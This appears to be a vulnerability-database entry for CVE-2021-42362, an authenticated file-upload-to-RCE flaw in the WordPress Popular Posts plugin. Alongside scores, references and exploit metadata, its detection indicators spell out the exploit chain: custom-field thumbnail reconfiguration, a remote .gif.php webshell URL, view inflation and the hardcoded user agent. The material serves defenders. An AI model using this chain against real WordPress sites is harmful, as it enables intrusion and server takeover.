CVE-2021-42362
published 2021-11-17CVE-2021-42362: The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the…
PriorityP278high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
79.82%
99.6th percentile
The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wordpress_popular_posts | wordpress_popular_posts | 0.0 – 5.3.2 | — |
| wordpress_popular_posts_project | wordpress_popular_posts | <= 5.3.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
GIF header prepended to PHP payload
- →Monitor POST requests to wp-admin/admin-ajax.php with action=add-meta and metakeyselect=wpp_thumbnail containing an external URL as the metavalue — this is the step that registers the remote shell URL as the post thumbnail custom field. ↗
- →Alert on files with double extensions (e.g. .gif.php) appearing under wp-content/uploads/wordpress-popular-posts/ — the exploit drops the webshell there after the plugin fetches and saves the remote payload. ↗
- →Detect outbound server-side HTTP requests originating from the WordPress process to external hosts for files with .gif.php or similar double-extension names — the plugin fetches the attacker-hosted payload automatically. ↗
- →Flag POST requests to wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools with body parameter thumb_source=custom_field — this reconfigures the plugin to accept arbitrary URLs for thumbnails, a prerequisite step in the exploit chain. ↗
- →Detect HTTP requests with User-Agent 'Monies Browser 1.0' targeting WordPress login and admin endpoints — this is the hardcoded UA string used by the public exploit script. ↗
- →Monitor POST requests to wp-admin/admin-ajax.php with action=wpp_clear_thumbnail — this cache-clearing step is performed by the exploit immediately before triggering the malicious thumbnail download. ↗
- →Rapid repeated GET requests to the same post URL (10 times in quick succession) followed by POSTs to /wp-json/wordpress-popular-posts/v1/popular-posts with wpp_id matching that post — this is the view-inflation step used to push the malicious post into the top-5 widget. ↗
- →The exploit requires the Metasploit payload server to be reachable on port 80, 443, or 8080 with a FQDN resolving to a non-RFC1918 address; monitor for WordPress servers making outbound connections to non-private IPs on these ports fetching image-like filenames. ↗
- ·The attacker must hold at least Contributor-level WordPress credentials — unauthenticated exploitation is not possible. ↗
- ·There is a ~90-second wait built into the exploit chain to allow the server-side Popular Posts cache (60 sec refresh) to expire before the widget loads and triggers the payload download. ↗
- ·The attacker-hosted payload server must respond to a HEAD request before the GET — defenders can use this two-phase fetch pattern as a detection signal. ↗
- ·Affects WordPress Popular Posts plugin versions up to and including 5.3.2 only. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
exploitdb·2021-07-15·CVSS 8.8
CVE-2021-42362 [HIGH] WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
---
# Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 15/07/2021
# Exploit Author: Simone Cristofaro
# Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/
# Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip
# Version: 5.3.2 or below
# Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27
# CVE: CVE-2021-42362
# Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/
# Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is
# enabled (otherwise WPP can't generate thumbnails). A
Metasploit
Wordpress Popular Posts Authenticated RCE
metasploit
Wordpress Popular Posts Authenticated RCE
Wordpress Popular Posts Authenticated RCE
This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after
No writeups or analysis indexed.
http://packetstormsecurity.com/files/165376/WordPress-Popular-Posts-5.3.2-Remote-Code-Execution.htmlhttps://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601https://plugins.trac.wordpress.org/changeset/2542638/wordpress-popular-posts/trunk/src/Image.phphttps://wpscan.com/vulnerability/bd4f157c-a3d7-4535-a587-0102ba4e3009https://www.wordfence.com/vulnerability-advisories/#CVE-2021-42362http://packetstormsecurity.com/files/165376/WordPress-Popular-Posts-5.3.2-Remote-Code-Execution.htmlhttps://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601https://plugins.trac.wordpress.org/changeset/2542638/wordpress-popular-posts/trunk/src/Image.phphttps://wpscan.com/vulnerability/bd4f157c-a3d7-4535-a587-0102ba4e3009https://www.wordfence.com/vulnerability-advisories/#CVE-2021-42362
2021-11-17
Published